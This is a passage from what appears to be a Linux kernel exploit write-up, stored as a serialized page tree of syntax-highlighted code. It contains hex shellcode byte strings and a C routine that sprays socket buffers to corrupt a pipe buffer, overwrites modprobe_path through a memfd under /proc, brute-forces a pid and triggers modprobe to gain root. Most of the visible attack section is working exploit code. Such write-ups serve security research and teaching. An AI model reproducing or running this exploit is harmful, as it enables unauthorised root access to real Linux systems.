0x45",{"type":25,"tag":216,"props":63557,"children":63558},{"style":6964},[63559],{"type":31,"value":7026},{"type":25,"tag":216,"props":63561,"children":63562},{"style":8205},[63563],{"type":31,"value":24020},{"type":25,"tag":216,"props":63565,"children":63566},{"style":52342},[63567],{"type":31,"value":63568},"\\x0f\\x22\\xd8\\xb8\\x01\\x00\\x00\\x80\\x0f\\x22\\xc0\\xea\\x57\\x00\\x00",{"type":25,"tag":216,"props":63570,"children":63571},{"style":8205},[63572],{"type":31,"value":24020},{"type":25,"tag":216,"props":63574,"children":63575},{"style":6964},[63576],{"type":31,"value":7026},{"type":25,"tag":216,"props":63578,"children":63579},{"style":6989},[63580],{"type":31,"value":63581},"15",{"type":25,"tag":216,"props":63583,"children":63584},{"style":6964},[63585],{"type":31,"value":7036},{"type":25,"tag":216,"props":63587,"children":63588},{"style":6953},[63589],{"type":31,"value":12528},{"type":25,"tag":216,"props":63591,"children":63592},{"style":6989},[63593],{"type":31,"value":6992},{"type":25,"tag":216,"props":63595,"children":63596},{"style":6953},[63597],{"type":31,"value":56652},{"type":25,"tag":216,"props":63599,"children":63600},{"class":6922,"line":7645},[63601,63605,63609,63613,63618,63622,63626,63631,63635,63639,63643,63647,63651,63655],{"type":25,"tag":216,"props":63602,"children":63603},{"style":7047},[63604],{"type":31,"value":63137},{"type":25,"tag":216,"props":63606,"children":63607},{"style":6964},[63608],{"type":31,"value":63079},{"type":25,"tag":216,"props":63610,"children":63611},{"style":6953},[63612],{"type":31,"value":3539},{"type":25,"tag":216,"props":63614,"children":63615},{"style":6989},[63616],{"type":31,"value":63617}," 0x55",{"type":25,"tag":216,"props":63619,"children":63620},{"style":6964},[63621],{"type":31,"value":7026},{"type":25,"tag":216,"props":63623,"children":63624},{"style":8205},[63625],{"type":31,"value":24020},{"type":25,"tag":216,"props":63627,"children":63628},{"style":52342},[63629],{"type":31,"value":63630},"\\x08\\x00\\xb9\\x01\\x01\\x00\\xc0\\xb8",{"type":25,"tag":216,"props":63632,"children":63633},{"style":8205},[63634],{"type":31,"value":24020},{"type":25,"tag":216,"props":63636,"children":63637},{"style":6964},[63638],{"type":31,"value":7026},{"type":25,"tag":216,"props":63640,"children":63641},{"style":6989},[63642],{"type":31,"value":8031},{"type":25,"tag":216,"props":63644,"children":63645},{"style":6964},[63646],{"type":31,"value":7036},{"type":25,"tag":216,"props":63648,"children":63649},{"style":6953},[63650],{"type":31,"value":12528},{"type":25,"tag":216,"props":63652,"children":63653},{"style":6989},[63654],{"type":31,"value":6992},{"type":25,"tag":216,"props":63656,"children":63657},{"style":6953},[63658],{"type":31,"value":56652},{"type":25,"tag":216,"props":63660,"children":63661},{"class":6922,"line":7654},[63662,63666,63670,63674,63679,63683,63687,63692,63696,63700,63704,63708,63712,63716],{"type":25,"tag":216,"props":63663,"children":63664},{"style":7047},[63665],{"type":31,"value":63137},{"type":25,"tag":216,"props":63667,"children":63668},{"style":6964},[63669],{"type":31,"value":63079},{"type":25,"tag":216,"props":63671,"children":63672},{"style":6953},[63673],{"type":31,"value":3539},{"type":25,"tag":216,"props":63675,"children":63676},{"style":6989},[63677],{"type":31,"value":63678}," 0x61",{"type":25,"tag":216,"props":63680,"children":63681},{"style":6964},[63682],{"type":31,"value":7026},{"type":25,"tag":216,"props":63684,"children":63685},{"style":8205},[63686],{"type":31,"value":24020},{"type":25,"tag":216,"props":63688,"children":63689},{"style":52342},[63690],{"type":31,"value":63691},"\\x31\\xd2\\x0f\\x30\\xe8",{"type":25,"tag":216,"props":63693,"children":63694},{"style":8205},[63695],{"type":31,"value":24020},{"type":25,"tag":216,"props":63697,"children":63698},{"style":6964},[63699],{"type":31,"value":7026},{"type":25,"tag":216,"props":63701,"children":63702},{"style":6989},[63703],{"type":31,"value":22067},{"type":25,"tag":216,"props":63705,"children":63706},{"style":6964},[63707],{"type":31,"value":7036},{"type":25,"tag":216,"props":63709,"children":63710},{"style":6953},[63711],{"type":31,"value":12528},{"type":25,"tag":216,"props":63713,"children":63714},{"style":6989},[63715],{"type":31,"value":6992},{"type":25,"tag":216,"props":63717,"children":63718},{"style":6953},[63719],{"type":31,"value":56652},{"type":25,"tag":216,"props":63721,"children":63722},{"class":6922,"line":7722},[63723,63727,63731,63735,63740,63744,63748,63753,63757,63761,63765,63769,63773,63777],{"type":25,"tag":216,"props":63724,"children":63725},{"style":7047},[63726],{"type":31,"value":63137},{"type":25,"tag":216,"props":63728,"children":63729},{"style":6964},[63730],{"type":31,"value":63079},{"type":25,"tag":216,"props":63732,"children":63733},{"style":6953},[63734],{"type":31,"value":3539},{"type":25,"tag":216,"props":63736,"children":63737},{"style":6989},[63738],{"type":31,"value":63739}," 0x6a",{"type":25,"tag":216,"props":63741,"children":63742},{"style":6964},[63743],{"type":31,"value":7026},{"type":25,"tag":216,"props":63745,"children":63746},{"style":8205},[63747],{"type":31,"value":24020},{"type":25,"tag":216,"props":63749,"children":63750},{"style":52342},[63751],{"type":31,"value":63752},"\\x48\\xc7\\xc6",{"type":25,"tag":216,"props":63754,"children":63755},{"style":8205},[63756],{"type":31,"value":24020},{"type":25,"tag":216,"props":63758,"children":63759},{"style":6964},[63760],{"type":31,"value":7026},{"type":25,"tag":216,"props":63762,"children":63763},{"style":6989},[63764],{"type":31,"value":21253},{"type":25,"tag":216,"props":63766,"children":63767},{"style":6964},[63768],{"type":31,"value":7036},{"type":25,"tag":216,"props":63770,"children":63771},{"style":6953},[63772],{"type":31,"value":12528},{"type":25,"tag":216,"props":63774,"children":63775},{"style":6989},[63776],{"type":31,"value":6992},{"type":25,"tag":216,"props":63778,"children":63779},{"style":6953},[63780],{"type":31,"value":56652},{"type":25,"tag":216,"props":63782,"children":63783},{"class":6922,"line":7730},[63784,63788,63792,63796,63801,63805,63809,63814,63818,63822,63826,63830,63834,63838],{"type":25,"tag":216,"props":63785,"children":63786},{"style":7047},[63787],{"type":31,"value":63137},{"type":25,"tag":216,"props":63789,"children":63790},{"style":6964},[63791],{"type":31,"value":63079},{"type":25,"tag":216,"props":63793,"children":63794},{"style":6953},[63795],{"type":31,"value":3539},{"type":25,"tag":216,"props":63797,"children":63798},{"style":6989},[63799],{"type":31,"value":63800}," 0x71",{"type":25,"tag":216,"props":63802,"children":63803},{"style":6964},[63804],{"type":31,"value":7026},{"type":25,"tag":216,"props":63806,"children":63807},{"style":8205},[63808],{"type":31,"value":24020},{"type":25,"tag":216,"props":63810,"children":63811},{"style":52342},[63812],{"type":31,"value":63813},"\\x48\\xc7\\xc0\\x80\\x00\\x00",{"type":25,"tag":216,"props":63815,"children":63816},{"style":8205},[63817],{"type":31,"value":24020},{"type":25,"tag":216,"props":63819,"children":63820},{"style":6964},[63821],{"type":31,"value":7026},{"type":25,"tag":216,"props":63823,"children":63824},{"style":6989},[63825],{"type":31,"value":22379},{"type":25,"tag":216,"props":63827,"children":63828},{"style":6964},[63829],{"type":31,"value":7036},{"type":25,"tag":216,"props":63831,"children":63832},{"style":6953},[63833],{"type":31,"value":12528},{"type":25,"tag":216,"props":63835,"children":63836},{"style":6989},[63837],{"type":31,"value":6992},{"type":25,"tag":216,"props":63839,"children":63840},{"style":6953},[63841],{"type":31,"value":56652},{"type":25,"tag":216,"props":63843,"children":63844},{"class":6922,"line":7760},[63845,63849,63853,63857,63862,63866,63870,63875,63879,63883,63887,63891,63895,63899],{"type":25,"tag":216,"props":63846,"children":63847},{"style":7047},[63848],{"type":31,"value":63137},{"type":25,"tag":216,"props":63850,"children":63851},{"style":6964},[63852],{"type":31,"value":63079},{"type":25,"tag":216,"props":63854,"children":63855},{"style":6953},[63856],{"type":31,"value":3539},{"type":25,"tag":216,"props":63858,"children":63859},{"style":6989},[63860],{"type":31,"value":63861}," 0x78",{"type":25,"tag":216,"props":63863,"children":63864},{"style":6964},[63865],{"type":31,"value":7026},{"type":25,"tag":216,"props":63867,"children":63868},{"style":8205},[63869],{"type":31,"value":24020},{"type":25,"tag":216,"props":63871,"children":63872},{"style":52342},[63873],{"type":31,"value":63874},"\\xff\\xe0",{"type":25,"tag":216,"props":63876,"children":63877},{"style":8205},[63878],{"type":31,"value":24020},{"type":25,"tag":216,"props":63880,"children":63881},{"style":6964},[63882],{"type":31,"value":7026},{"type":25,"tag":216,"props":63884,"children":63885},{"style":6989},[63886],{"type":31,"value":331},{"type":25,"tag":216,"props":63888,"children":63889},{"style":6964},[63890],{"type":31,"value":7036},{"type":25,"tag":216,"props":63892,"children":63893},{"style":6953},[63894],{"type":31,"value":12528},{"type":25,"tag":216,"props":63896,"children":63897},{"style":6989},[63898],{"type":31,"value":6992},{"type":25,"tag":216,"props":63900,"children":63901},{"style":6964},[63902],{"type":31,"value":7107},{"type":25,"tag":216,"props":63904,"children":63905},{"class":6922,"line":7768},[63906,63910,63914],{"type":25,"tag":216,"props":63907,"children":63908},{"style":6973},[63909],{"type":31,"value":19702},{"type":25,"tag":216,"props":63911,"children":63912},{"style":6936},[63913],{"type":31,"value":16425},{"type":25,"tag":216,"props":63915,"children":63916},{"style":6964},[63917],{"type":31,"value":6967},{"type":25,"tag":216,"props":63919,"children":63920},{"class":6922,"line":7800},[63921],{"type":25,"tag":216,"props":63922,"children":63923},{"emptyLinePlaceholder":16},[63924],{"type":31,"value":7642},{"type":25,"tag":216,"props":63926,"children":63927},{"class":6922,"line":7808},[63928,63932,63936],{"type":25,"tag":216,"props":63929,"children":63930},{"style":6973},[63931],{"type":31,"value":20947},{"type":25,"tag":216,"props":63933,"children":63934},{"style":6936},[63935],{"type":31,"value":13012},{"type":25,"tag":216,"props":63937,"children":63938},{"style":6964},[63939],{"type":31,"value":6967},{"type":25,"tag":216,"props":63941,"children":63942},{"class":6922,"line":7868},[63943],{"type":25,"tag":216,"props":63944,"children":63945},{"style":6964},[63946],{"type":31,"value":7874},{"type":25,"tag":216,"props":63948,"children":63949},{"class":6922,"line":13001},[63950],{"type":25,"tag":216,"props":63951,"children":63952},{"style":6964},[63953],{"type":31,"value":14275},{"type":25,"tag":606,"props":63955,"children":63957},{"id":63956},"overwriting-modprobe_path",[63958,63960],{"type":31,"value":63959},"Overwriting ",{"type":25,"tag":82,"props":63961,"children":63963},{"className":63962},[],[63964],{"type":31,"value":62345},{"type":25,"tag":38,"props":63966,"children":63967},{},[63968,63970,63976],{"type":31,"value":63969},"Finding the ",{"type":25,"tag":82,"props":63971,"children":63973},{"className":63972},[],[63974],{"type":31,"value":63975},"/sbin/modprobe",{"type":31,"value":63977}," string in kernel memory and replacing it with a controlled value that points to a file we own finally becomes relatively trivial.",{"type":25,"tag":38,"props":63979,"children":63980},{},[63981,63983,63989],{"type":31,"value":63982},"A very well-known trick for this to work, although we are running in a chroot without being able to create files at the root filesystem, is using a memfd exposed through ",{"type":25,"tag":82,"props":63984,"children":63986},{"className":63985},[],[63987],{"type":31,"value":63988},"/proc/\u003Cpid>/fd/\u003Cn>.",{"type":31,"value":63990}," It's worth adding that, given that our pid outside the unprivileged namespace is unknown to us, we brute-force it.",{"type":25,"tag":206,"props":63992,"children":63994},{"className":33070,"code":63993,"language":33072,"meta":7,"style":7},"[...]\n    puts(\"[*] overwrite modprobe_path\");\n    for (int i = 0; i \u003C 4194304; i++)\n    {\n        pipebuf->page = modprobe_page;\n        pipebuf->offset = modprobe_off;\n        pipebuf->len = 0;\n        for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n        {\n            if (write(sock[i][0], pipebuf, 1024 - 320) \u003C 0)\n            {\n                perror(\"[-] write(socket)\");\n                break;\n            }\n        }\n\n        memset(&data, 0, PAGE_SIZE);\n        snprintf(fd_path, sizeof(fd_path), \"/proc/%i/fd/%i\", i, modprobe_fd);\n\n        lseek(modprobe_fd, 0, SEEK_SET);\n        dprintf(modprobe_fd, MODPROBE_SCRIPT, i, status_fd, i, stdin_fd, i, stdout_fd);\n\n        if (write(pfd[pipe_idx][1], fd_path, 32) \u003C 0)\n        {\n            perror(\"\\n[-] write(pipe)\");\n        }\n\n        if (check_modprobe(fd_path))\n        {\n            puts(\"[-] failed to overwrite modprobe\");\n            break;\n        }\n\n        if (trigger_modprobe(status_fd))\n        {\n            puts(\"\\n[+] got root\");\n            goto out;\n        }\n\n        for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n        {\n            if (read(sock[i][1], leak, 1024 - 320) \u003C 0)\n            {\n                perror(\"[-] read(socket)\");\n                return -1;\n            }\n        }\n    }\n    puts(\"[-] fake modprobe failed\");\n[...]\n",[63995],{"type":25,"tag":82,"props":63996,"children":63997},{"__ignoreMap":7},[63998,64005,64027,64035,64042,64050,64058,64066,64074,64081,64089,64096,64134,64145,64152,64159,64166,64193,64224,64231,64253,64266,64273,64331,64338,64366,64373,64380,64401,64408,64429,64440,64447,64454,64475,64482,64510,64523,64530,64537,64586,64593,64661,64668,64689,64709,64716,64723,64730,64750],{"type":25,"tag":216,"props":63999,"children":64000},{"class":6922,"line":6923},[64001],{"type":25,"tag":216,"props":64002,"children":64003},{"style":6964},[64004],{"type":31,"value":14275},{"type":25,"tag":216,"props":64006,"children":64007},{"class":6922,"line":6769},[64008,64013,64018,64023],{"type":25,"tag":216,"props":64009,"children":64010},{"style":6964},[64011],{"type":31,"value":64012},"    puts(\"[*] ",{"type":25,"tag":216,"props":64014,"children":64015},{"style":7375},[64016],{"type":31,"value":64017},"overwrite",{"type":25,"tag":216,"props":64019,"children":64020},{"style":7375},[64021],{"type":31,"value":64022}," modprobe_path",{"type":25,"tag":216,"props":64024,"children":64025},{"style":8205},[64026],{"type":31,"value":60260},{"type":25,"tag":216,"props":64028,"children":64029},{"class":6922,"line":6778},[64030],{"type":25,"tag":216,"props":64031,"children":64032},{"style":8205},[64033],{"type":31,"value":64034},"    for (int i = 0; i \u003C 4194304; i++)\n",{"type":25,"tag":216,"props":64036,"children":64037},{"class":6922,"line":7005},[64038],{"type":25,"tag":216,"props":64039,"children":64040},{"style":8205},[64041],{"type":31,"value":33147},{"type":25,"tag":216,"props":64043,"children":64044},{"class":6922,"line":7110},[64045],{"type":25,"tag":216,"props":64046,"children":64047},{"style":8205},[64048],{"type":31,"value":64049},"        pipebuf->page = modprobe_page;\n",{"type":25,"tag":216,"props":64051,"children":64052},{"class":6922,"line":7216},[64053],{"type":25,"tag":216,"props":64054,"children":64055},{"style":8205},[64056],{"type":31,"value":64057},"        pipebuf->offset = modprobe_off;\n",{"type":25,"tag":216,"props":64059,"children":64060},{"class":6922,"line":7244},[64061],{"type":25,"tag":216,"props":64062,"children":64063},{"style":8205},[64064],{"type":31,"value":64065},"        pipebuf->len = 0;\n",{"type":25,"tag":216,"props":64067,"children":64068},{"class":6922,"line":7257},[64069],{"type":25,"tag":216,"props":64070,"children":64071},{"style":8205},[64072],{"type":31,"value":64073},"        for (int i = 0; i \u003C SKBUF_SPRAY; i++)\n",{"type":25,"tag":216,"props":64075,"children":64076},{"class":6922,"line":7275},[64077],{"type":25,"tag":216,"props":64078,"children":64079},{"style":8205},[64080],{"type":31,"value":35621},{"type":25,"tag":216,"props":64082,"children":64083},{"class":6922,"line":7296},[64084],{"type":25,"tag":216,"props":64085,"children":64086},{"style":8205},[64087],{"type":31,"value":64088},"            if (write(sock[i][0], pipebuf, 1024 - 320) \u003C 0)\n",{"type":25,"tag":216,"props":64090,"children":64091},{"class":6922,"line":7305},[64092],{"type":25,"tag":216,"props":64093,"children":64094},{"style":8205},[64095],{"type":31,"value":35657},{"type":25,"tag":216,"props":64097,"children":64098},{"class":6922,"line":7557},[64099,64104,64108,64112,64116,64121,64125,64129],{"type":25,"tag":216,"props":64100,"children":64101},{"style":8205},[64102],{"type":31,"value":64103},"                perror(\"",{"type":25,"tag":216,"props":64105,"children":64106},{"style":6964},[64107],{"type":31,"value":7701},{"type":25,"tag":216,"props":64109,"children":64110},{"style":6953},[64111],{"type":31,"value":8276},{"type":25,"tag":216,"props":64113,"children":64114},{"style":6964},[64115],{"type":31,"value":12614},{"type":25,"tag":216,"props":64117,"children":64118},{"style":7375},[64119],{"type":31,"value":64120},"write",{"type":25,"tag":216,"props":64122,"children":64123},{"style":6964},[64124],{"type":31,"value":1850},{"type":25,"tag":216,"props":64126,"children":64127},{"style":7375},[64128],{"type":31,"value":45903},{"type":25,"tag":216,"props":64130,"children":64131},{"style":6964},[64132],{"type":31,"value":64133},")\");\n",{"type":25,"tag":216,"props":64135,"children":64136},{"class":6922,"line":7574},[64137,64141],{"type":25,"tag":216,"props":64138,"children":64139},{"style":6973},[64140],{"type":31,"value":62927},{"type":25,"tag":216,"props":64142,"children":64143},{"style":6964},[64144],{"type":31,"value":6967},{"type":25,"tag":216,"props":64146,"children":64147},{"class":6922,"line":7591},[64148],{"type":25,"tag":216,"props":64149,"children":64150},{"style":6964},[64151],{"type":31,"value":62852},{"type":25,"tag":216,"props":64153,"children":64154},{"class":6922,"line":7604},[64155],{"type":25,"tag":216,"props":64156,"children":64157},{"style":6964},[64158],{"type":31,"value":7302},{"type":25,"tag":216,"props":64160,"children":64161},{"class":6922,"line":7613},[64162],{"type":25,"tag":216,"props":64163,"children":64164},{"emptyLinePlaceholder":16},[64165],{"type":31,"value":7642},{"type":25,"tag":216,"props":64167,"children":64168},{"class":6922,"line":7636},[64169,64173,64177,64181,64185,64189],{"type":25,"tag":216,"props":64170,"children":64171},{"style":7047},[64172],{"type":31,"value":58585},{"type":25,"tag":216,"props":64174,"children":64175},{"style":6964},[64176],{"type":31,"value":1850},{"type":25,"tag":216,"props":64178,"children":64179},{"style":6953},[64180],{"type":31,"value":7059},{"type":25,"tag":216,"props":64182,"children":64183},{"style":6964},[64184],{"type":31,"value":62738},{"type":25,"tag":216,"props":64186,"children":64187},{"style":6989},[64188],{"type":31,"value":1882},{"type":25,"tag":216,"props":64190,"children":64191},{"style":6964},[64192],{"type":31,"value":62747},{"type":25,"tag":216,"props":64194,"children":64195},{"class":6922,"line":7645},[64196,64200,64205,64209,64214,64219],{"type":25,"tag":216,"props":64197,"children":64198},{"style":7047},[64199],{"type":31,"value":59286},{"type":25,"tag":216,"props":64201,"children":64202},{"style":6964},[64203],{"type":31,"value":64204},"(fd_path, ",{"type":25,"tag":216,"props":64206,"children":64207},{"style":6936},[64208],{"type":31,"value":59296},{"type":25,"tag":216,"props":64210,"children":64211},{"style":6964},[64212],{"type":31,"value":64213},"(fd_path), ",{"type":25,"tag":216,"props":64215,"children":64216},{"style":8205},[64217],{"type":31,"value":64218},"\"/proc/%i/fd/%i\"",{"type":25,"tag":216,"props":64220,"children":64221},{"style":6964},[64222],{"type":31,"value":64223},", i, modprobe_fd);\n",{"type":25,"tag":216,"props":64225,"children":64226},{"class":6922,"line":7654},[64227],{"type":25,"tag":216,"props":64228,"children":64229},{"emptyLinePlaceholder":16},[64230],{"type":31,"value":7642},{"type":25,"tag":216,"props":64232,"children":64233},{"class":6922,"line":7722},[64234,64239,64244,64248],{"type":25,"tag":216,"props":64235,"children":64236},{"style":7047},[64237],{"type":31,"value":64238},"        lseek",{"type":25,"tag":216,"props":64240,"children":64241},{"style":6964},[64242],{"type":31,"value":64243},"(modprobe_fd, ",{"type":25,"tag":216,"props":64245,"children":64246},{"style":6989},[64247],{"type":31,"value":1882},{"type":25,"tag":216,"props":64249,"children":64250},{"style":6964},[64251],{"type":31,"value":64252},", SEEK_SET);\n",{"type":25,"tag":216,"props":64254,"children":64255},{"class":6922,"line":7730},[64256,64261],{"type":25,"tag":216,"props":64257,"children":64258},{"style":7047},[64259],{"type":31,"value":64260},"        dprintf",{"type":25,"tag":216,"props":64262,"children":64263},{"style":6964},[64264],{"type":31,"value":64265},"(modprobe_fd, MODPROBE_SCRIPT, i, status_fd, i, stdin_fd, i, stdout_fd);\n",{"type":25,"tag":216,"props":64267,"children":64268},{"class":6922,"line":7760},[64269],{"type":25,"tag":216,"props":64270,"children":64271},{"emptyLinePlaceholder":16},[64272],{"type":31,"value":7642},{"type":25,"tag":216,"props":64274,"children":64275},{"class":6922,"line":7768},[64276,64280,64284,64288,64292,64296,64301,64305,64310,64315,64319,64323,64327],{"type":25,"tag":216,"props":64277,"children":64278},{"style":6973},[64279],{"type":31,"value":7222},{"type":25,"tag":216,"props":64281,"children":64282},{"style":6964},[64283],{"type":31,"value":7016},{"type":25,"tag":216,"props":64285,"children":64286},{"style":7047},[64287],{"type":31,"value":64120},{"type":25,"tag":216,"props":64289,"children":64290},{"style":6964},[64291],{"type":31,"value":1850},{"type":25,"tag":216,"props":64293,"children":64294},{"style":6947},[64295],{"type":31,"value":62791},{"type":25,"tag":216,"props":64297,"children":64298},{"style":6964},[64299],{"type":31,"value":64300},"[pipe_idx][",{"type":25,"tag":216,"props":64302,"children":64303},{"style":6989},[64304],{"type":31,"value":184},{"type":25,"tag":216,"props":64306,"children":64307},{"style":6964},[64308],{"type":31,"value":64309},"], fd_path, ",{"type":25,"tag":216,"props":64311,"children":64312},{"style":6989},[64313],{"type":31,"value":64314},"32",{"type":25,"tag":216,"props":64316,"children":64317},{"style":6964},[64318],{"type":31,"value":7036},{"type":25,"tag":216,"props":64320,"children":64321},{"style":6953},[64322],{"type":31,"value":9757},{"type":25,"tag":216,"props":64324,"children":64325},{"style":6989},[64326],{"type":31,"value":6992},{"type":25,"tag":216,"props":64328,"children":64329},{"style":6964},[64330],{"type":31,"value":7107},{"type":25,"tag":216,"props":64332,"children":64333},{"class":6922,"line":7800},[64334],{"type":25,"tag":216,"props":64335,"children":64336},{"style":6964},[64337],{"type":31,"value":35621},{"type":25,"tag":216,"props":64339,"children":64340},{"class":6922,"line":7808},[64341,64345,64349,64353,64357,64362],{"type":25,"tag":216,"props":64342,"children":64343},{"style":7047},[64344],{"type":31,"value":61865},{"type":25,"tag":216,"props":64346,"children":64347},{"style":6964},[64348],{"type":31,"value":1850},{"type":25,"tag":216,"props":64350,"children":64351},{"style":8205},[64352],{"type":31,"value":24020},{"type":25,"tag":216,"props":64354,"children":64355},{"style":52342},[64356],{"type":31,"value":52345},{"type":25,"tag":216,"props":64358,"children":64359},{"style":8205},[64360],{"type":31,"value":64361},"[-] write(pipe)\"",{"type":25,"tag":216,"props":64363,"children":64364},{"style":6964},[64365],{"type":31,"value":7797},{"type":25,"tag":216,"props":64367,"children":64368},{"class":6922,"line":7868},[64369],{"type":25,"tag":216,"props":64370,"children":64371},{"style":6964},[64372],{"type":31,"value":7302},{"type":25,"tag":216,"props":64374,"children":64375},{"class":6922,"line":13001},[64376],{"type":25,"tag":216,"props":64377,"children":64378},{"emptyLinePlaceholder":16},[64379],{"type":31,"value":7642},{"type":25,"tag":216,"props":64381,"children":64382},{"class":6922,"line":13019},[64383,64387,64391,64396],{"type":25,"tag":216,"props":64384,"children":64385},{"style":6973},[64386],{"type":31,"value":7222},{"type":25,"tag":216,"props":64388,"children":64389},{"style":6964},[64390],{"type":31,"value":7016},{"type":25,"tag":216,"props":64392,"children":64393},{"style":7047},[64394],{"type":31,"value":64395},"check_modprobe",{"type":25,"tag":216,"props":64397,"children":64398},{"style":6964},[64399],{"type":31,"value":64400},"(fd_path))\n",{"type":25,"tag":216,"props":64402,"children":64403},{"class":6922,"line":13064},[64404],{"type":25,"tag":216,"props":64405,"children":64406},{"style":6964},[64407],{"type":31,"value":35621},{"type":25,"tag":216,"props":64409,"children":64410},{"class":6922,"line":13170},[64411,64416,64420,64425],{"type":25,"tag":216,"props":64412,"children":64413},{"style":7047},[64414],{"type":31,"value":64415},"            puts",{"type":25,"tag":216,"props":64417,"children":64418},{"style":6964},[64419],{"type":31,"value":1850},{"type":25,"tag":216,"props":64421,"children":64422},{"style":8205},[64423],{"type":31,"value":64424},"\"[-] failed to overwrite modprobe\"",{"type":25,"tag":216,"props":64426,"children":64427},{"style":6964},[64428],{"type":31,"value":7797},{"type":25,"tag":216,"props":64430,"children":64431},{"class":6922,"line":27455},[64432,64436],{"type":25,"tag":216,"props":64433,"children":64434},{"style":6973},[64435],{"type":31,"value":7250},{"type":25,"tag":216,"props":64437,"children":64438},{"style":6964},[64439],{"type":31,"value":6967},{"type":25,"tag":216,"props":64441,"children":64442},{"class":6922,"line":27490},[64443],{"type":25,"tag":216,"props":64444,"children":64445},{"style":6964},[64446],{"type":31,"value":7302},{"type":25,"tag":216,"props":64448,"children":64449},{"class":6922,"line":27498},[64450],{"type":25,"tag":216,"props":64451,"children":64452},{"emptyLinePlaceholder":16},[64453],{"type":31,"value":7642},{"type":25,"tag":216,"props":64455,"children":64456},{"class":6922,"line":27506},[64457,64461,64465,64470],{"type":25,"tag":216,"props":64458,"children":64459},{"style":6973},[64460],{"type":31,"value":7222},{"type":25,"tag":216,"props":64462,"children":64463},{"style":6964},[64464],{"type":31,"value":7016},{"type":25,"tag":216,"props":64466,"children":64467},{"style":7047},[64468],{"type":31,"value":64469},"trigger_modprobe",{"type":25,"tag":216,"props":64471,"children":64472},{"style":6964},[64473],{"type":31,"value":64474},"(status_fd))\n",{"type":25,"tag":216,"props":64476,"children":64477},{"class":6922,"line":27515},[64478],{"type":25,"tag":216,"props":64479,"children":64480},{"style":6964},[64481],{"type":31,"value":35621},{"type":25,"tag":216,"props":64483,"children":64484},{"class":6922,"line":27557},[64485,64489,64493,64497,64501,64506],{"type":25,"tag":216,"props":64486,"children":64487},{"style":7047},[64488],{"type":31,"value":64415},{"type":25,"tag":216,"props":64490,"children":64491},{"style":6964},[64492],{"type":31,"value":1850},{"type":25,"tag":216,"props":64494,"children":64495},{"style":8205},[64496],{"type":31,"value":24020},{"type":25,"tag":216,"props":64498,"children":64499},{"style":52342},[64500],{"type":31,"value":52345},{"type":25,"tag":216,"props":64502,"children":64503},{"style":8205},[64504],{"type":31,"value":64505},"[+] got root\"",{"type":25,"tag":216,"props":64507,"children":64508},{"style":6964},[64509],{"type":31,"value":7797},{"type":25,"tag":216,"props":64511,"children":64512},{"class":6922,"line":27590},[64513,64518],{"type":25,"tag":216,"props":64514,"children":64515},{"style":6973},[64516],{"type":31,"value":64517},"            goto",{"type":25,"tag":216,"props":64519,"children":64520},{"style":6964},[64521],{"type":31,"value":64522}," out;\n",{"type":25,"tag":216,"props":64524,"children":64525},{"class":6922,"line":27598},[64526],{"type":25,"tag":216,"props":64527,"children":64528},{"style":6964},[64529],{"type":31,"value":7302},{"type":25,"tag":216,"props":64531,"children":64532},{"class":6922,"line":27606},[64533],{"type":25,"tag":216,"props":64534,"children":64535},{"emptyLinePlaceholder":16},[64536],{"type":31,"value":7642},{"type":25,"tag":216,"props":64538,"children":64539},{"class":6922,"line":27615},[64540,64545,64549,64553,64557,64561,64565,64569,64573,64578,64582],{"type":25,"tag":216,"props":64541,"children":64542},{"style":6973},[64543],{"type":31,"value":64544},"        for",{"type":25,"tag":216,"props":64546,"children":64547},{"style":6964},[64548],{"type":31,"value":7016},{"type":25,"tag":216,"props":64550,"children":64551},{"style":6936},[64552],{"type":31,"value":23007},{"type":25,"tag":216,"props":64554,"children":64555},{"style":6964},[64556],{"type":31,"value":58512},{"type":25,"tag":216,"props":64558,"children":64559},{"style":6953},[64560],{"type":31,"value":266},{"type":25,"tag":216,"props":64562,"children":64563},{"style":6989},[64564],{"type":31,"value":6992},{"type":25,"tag":216,"props":64566,"children":64567},{"style":6964},[64568],{"type":31,"value":55202},{"type":25,"tag":216,"props":64570,"children":64571},{"style":6953},[64572],{"type":31,"value":9757},{"type":25,"tag":216,"props":64574,"children":64575},{"style":6964},[64576],{"type":31,"value":64577}," SKBUF_SPRAY; i",{"type":25,"tag":216,"props":64579,"children":64580},{"style":6953},[64581],{"type":31,"value":55238},{"type":25,"tag":216,"props":64583,"children":64584},{"style":6964},[64585],{"type":31,"value":7107},{"type":25,"tag":216,"props":64587,"children":64588},{"class":6922,"line":27691},[64589],{"type":25,"tag":216,"props":64590,"children":64591},{"style":6964},[64592],{"type":31,"value":35621},{"type":25,"tag":216,"props":64594,"children":64595},{"class":6922,"line":27724},[64596,64600,64604,64609,64613,64618,64623,64627,64632,64636,64640,64645,64649,64653,64657],{"type":25,"tag":216,"props":64597,"children":64598},{"style":6973},[64599],{"type":31,"value":62768},{"type":25,"tag":216,"props":64601,"children":64602},{"style":6964},[64603],{"type":31,"value":7016},{"type":25,"tag":216,"props":64605,"children":64606},{"style":7047},[64607],{"type":31,"value":64608},"read",{"type":25,"tag":216,"props":64610,"children":64611},{"style":6964},[64612],{"type":31,"value":1850},{"type":25,"tag":216,"props":64614,"children":64615},{"style":6947},[64616],{"type":31,"value":64617},"sock",{"type":25,"tag":216,"props":64619,"children":64620},{"style":6964},[64621],{"type":31,"value":64622},"[i][",{"type":25,"tag":216,"props":64624,"children":64625},{"style":6989},[64626],{"type":31,"value":184},{"type":25,"tag":216,"props":64628,"children":64629},{"style":6964},[64630],{"type":31,"value":64631},"], leak, ",{"type":25,"tag":216,"props":64633,"children":64634},{"style":6989},[64635],{"type":31,"value":62116},{"type":25,"tag":216,"props":64637,"children":64638},{"style":6953},[64639],{"type":31,"value":55224},{"type":25,"tag":216,"props":64641,"children":64642},{"style":6989},[64643],{"type":31,"value":64644}," 320",{"type":25,"tag":216,"props":64646,"children":64647},{"style":6964},[64648],{"type":31,"value":7036},{"type":25,"tag":216,"props":64650,"children":64651},{"style":6953},[64652],{"type":31,"value":9757},{"type":25,"tag":216,"props":64654,"children":64655},{"style":6989},[64656],{"type":31,"value":6992},{"type":25,"tag":216,"props":64658,"children":64659},{"style":6964},[64660],{"type":31,"value":7107},{"type":25,"tag":216,"props":64662,"children":64663},{"class":6922,"line":27732},[64664],{"type":25,"tag":216,"props":64665,"children":64666},{"style":6964},[64667],{"type":31,"value":35657},{"type":25,"tag":216,"props":64669,"children":64670},{"class":6922,"line":27740},[64671,64676,64680,64685],{"type":25,"tag":216,"props":64672,"children":64673},{"style":7047},[64674],{"type":31,"value":64675},"                